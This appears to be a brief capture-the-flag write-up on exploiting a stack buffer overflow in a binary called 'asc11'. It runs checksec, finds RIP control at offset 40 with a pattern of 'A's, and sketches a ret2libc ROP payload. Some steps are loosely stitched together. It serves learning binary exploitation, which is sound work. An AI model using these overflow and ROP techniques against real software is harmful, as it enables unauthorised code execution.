file asc11
checksec asc11

Output (example):

asc11: ELF 64-bit, dynamically linked, not stripped
Arch: amd64
RELRO: Partial
Stack: No canary found
NX: Enabled
PIE: Disabled

Run it to see behavior:

./asc11

It prints "Input: ", waits for input, then exits. Open in Ghidra/IDA. The main function:

gdb ./asc11
r < <(python3 -c "print('A'*50)")

Crash at RIP = 0x4141414141414141 → offset 40. Check if there's a win or shell function:

objdump -d asc11 | grep -E "win|system|shell"

If none, we need ret2libc.

payload = b'A'*offset + rop.chain()
p.sendlineafter(b'Input: ', payload)